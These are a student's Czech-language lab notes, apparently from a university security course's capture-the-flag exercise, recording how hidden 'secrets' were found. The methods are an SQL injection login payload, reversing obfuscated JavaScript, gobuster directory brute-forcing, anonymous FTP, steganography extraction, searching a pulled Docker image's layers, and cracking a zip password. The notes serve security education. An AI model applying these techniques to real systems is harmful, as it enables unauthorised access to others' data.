Tajemstvi B_03-12-13-15-01_179115ac45fb6763dc7de63308f867042f7aa3f87746cfa805f7684b8fbb481c
Jmeno: ' or 1=1 --
Heslo: johnny
SQL injection

A_03-12-18-45-02_c570db9ffc17337450c4a4b61a7cb34c7479729a63a5a59549a5ede213b34c79
Admin kod: 18877

const checkCode = (code) => {

	let _0xcb7e = ["\x45\x24\x38", "\x36\x36\x36", "\x45\x24\x41"];
	let checksum = code + _0xcb7e[1];
	checksum = checksum - (-0x1 * 0xa4c + -0x1e57 * 0x1 + -0x12 * -0x242), checksum <<= -0x1 * -0x1f99 + 0x563 * 0x5 + 0x2 * -0x1d43, checksum = checksum * (0x2115 + 0x65f * -0x2 + -0x1454) - (-0x2f * -0x51 + 0x84e * 0x1 + -0x1493);

	return (checksum == 226531314);
}

Dosazeni do rovnic pro vypocet checksum odzadu cislo 226531314 a postupne az k prvni rovnici , let checksum = code + _0xcb7e[1]; jen prilipne 666 za zadany kod

Tajemstvi C_05-12-14-45-01_3cba78700ec332c61b44b4dba0caf988bfcc5a8572f0fe1bf6a6e09f1f0629af
http://localhost:3880/hidden/secret.php

Vyuziti komentare <!-- Admin, please care for absconditum (latinsky skryte - hidden) directory -->:
common.txt z odkazu: https://github.com/v0re/dirb/blob/master/wordlists/common.txt (na konec jsem přidala ještě slova absconditum a secret)
katerina@katerina-ASUS:~$ gobuster -e -u http://localhost:3880/ -w /home/katerina/Documents/BIS/common.txt

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://localhost:3880/
[+] Threads      : 10
[+] Wordlist     : /home/katerina/Documents/BIS/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Expanded     : true
[+] Timeout      : 10s
=====================================================
2021/12/05 14:33:59 Starting gobuster
=====================================================
http://localhost:3880/.htaccess (Status: 403)
http://localhost:3880/.hta (Status: 403)
http://localhost:3880/.htpasswd (Status: 403)
http://localhost:3880/cgi-bin/ (Status: 403)
http://localhost:3880/hidden (Status: 301)
http://localhost:3880/index.html (Status: 200)
http://localhost:3880/robots.txt (Status: 403)
=====================================================
2021/12/05 14:34:16 Finished
=====================================================

Složka hidden - latinsky právě absconditum. Pokus v hledání v této složce:
gobuster -e -u http://localhost:3880/hidden/ -w /home/katerina/Documents/BIS/common.txt -x txt,php,html,htm
http://localhost:3880/hidden/secret.php (Status: 200)

Tajemstvi J_05-12-21-15-01_164398c042740190f0a6763ae7217ace2069b0a57f940ff091e00ea0bf5e0ac9
[student@xforto00 ~]$ curl -P - --insecure "ftp://192.168.10.199"
drwxr-xr-x    1 ftp      ftp            76 Dec 05 19:44 pub
[student@xforto00 ~]$ curl -P - --insecure "ftp://192.168.10.199/pub/"
-rw-r--r--    1 ftp      ftp             9 Dec 05 20:14 data.txt
-rw-rw-r--    1 ftp      ftp        129677 Dec 05 20:14 image1.jpg
-rw-r--r--    1 ftp      ftp        180371 Dec 05 20:14 image2.jpg
-rw-r--r--    1 ftp      ftp           642 Dec 05 20:14 secret.asc

image1.jpg - nahrání do toolu: https://lukeslytalker.pythonanywhere.com/outguess/scan
Attempting to extract with OUTGUESS 0.2
Found something!!!
Result size: 92 (type: '/tmp/out: ASCII text')
Tajemstvi J_05-12-21-15-01_164398c042740190f0a6763ae7217ace2069b0a57f940ff091e00ea0bf5e0ac9

Tajemstvi D:
[student@xforto00 ~]$ curl -X GET http://192.168.10.145:5000/v2/_catalog
{"repositories":["docker_fun"]}
[student@xforto00 ~]$ docker login 192.168.10.145:5000
Username: johnny
Password:
[student@xforto00 ~]$ docker pull 192.168.10.145:5000/docker_fun
Using default tag: latest
latest: Pulling from docker_fun
7b1a6ab2e44d: Pull complete
0e5b1c341888: Pull complete
fe2bb3a85b39: Pull complete
b5d571090d69: Pull complete
21455655f96f: Pull complete
d537babc8f70: Pull complete
b787afbadd2e: Pull complete
f6a81fc7d5c6: Pull complete
5a01b72f9139: Pull complete
Digest: sha256:894163a90cab78a161a0dd1210cd6f9cc3184121a1845d0ab3cc7c83a01ad295
Status: Downloaded newer image for 192.168.10.145:5000/docker_fun:latest
192.168.10.145:5000/docker_fun:latest
[student@xforto00 ~]$ docker images
REPOSITORY                       TAG       IMAGE ID       CREATED          SIZE
192.168.10.145:5000/docker_fun   latest    bcda3a417398   23 minutes ago   72.8MB
[root@xforto00 docker]# ls
btrfs     containerd  image    plugins   swarm  trust
buildkit  containers  network  runtimes  tmp    volumes
[root@xforto00 docker]# find . -type f -name "*.txt"
./btrfs/subvolumes/3f657d455d2e1d33ad91ee1b34da895776487208637552e84d7918a0b245f3fe/tmp/secret.txt
./btrfs/subvolumes/5294ab2092419d9ee960f76b9930769d0a6d028b7d0d4ae37de519b55a6e75a0/tmp/secret.txt
./btrfs/subvolumes/cda0ce3ef60ad2978d62c42f0bd4ec15afb1d6ffd6d7edadd07b143e9552d62e/tmp/secret.txt
./btrfs/subvolumes/4eaf246e92753620ae67c30b21ae46df3ae23265e004d4eb97b033421c9d38d5/tmp/secret.txt
[root@xforto00 docker]# cat ./btrfs/subvolumes/3f657d455d2e1d33ad91ee1b34da895776487208637552e84d7918a0b245f3fe/tmp/secret.txt
Tajemstvi D_26-10-17-15-06_6e9f6d7754a7c05b9f9ba5b59d67a549c69219b3666b256689c5d420a25efd0a
[root@xforto00 docker]# cat ./btrfs/subvolumes/5294ab2092419d9ee960f76b9930769d0a6d028b7d0d4ae37de519b55a6e75a0/tmp/secret.txt
ahoj
[root@xforto00 docker]# cat ./btrfs/subvolumes/cda0ce3ef60ad2978d62c42f0bd4ec15afb1d6ffd6d7edadd07b143e9552d62e/tmp/secret.txt
bbbbbb
[root@xforto00 docker]# cat ./btrfs/subvolumes/4eaf246e92753620ae67c30b21ae46df3ae23265e004d4eb97b033421c9d38d5/tmp/secret.txt
Tajemstvi D_16-12-20-45-01_e987c8acf8f73bb68001f2f33f3764cd97fd15c1c7228e033e6a1e992064c259

Tajemstvi E:
Tajemstvi E_16-12-21-15-01_abb737b8d111b9d6502891e316105aa439a7d210e96690554cfdc6e1471fb11d
katerina@katerina-ASUS:~/Documents/BIS/sv2_files$ yazc -a -A -n  crack_me.zip
yazc: invalid option -- 'a'
katerina@katerina-ASUS:~/Documents/BIS/sv2_files$ yazc -a  crack_me.zip
yazc: invalid option -- 'a'
katerina@katerina-ASUS:~/Documents/BIS/sv2_files$ yazc --alpha  crack_me.zip
yazc: unrecognized option '--alpha'
katerina@katerina-ASUS:~/Documents/BIS/sv2_files$ yazc bruteforce -a -A -n  crack_me.zip
^C
katerina@katerina-ASUS:~/Documents/BIS/sv2_files$ yazc bruteforce -a -A -n -s  crack_me.zip
Password is:  /$
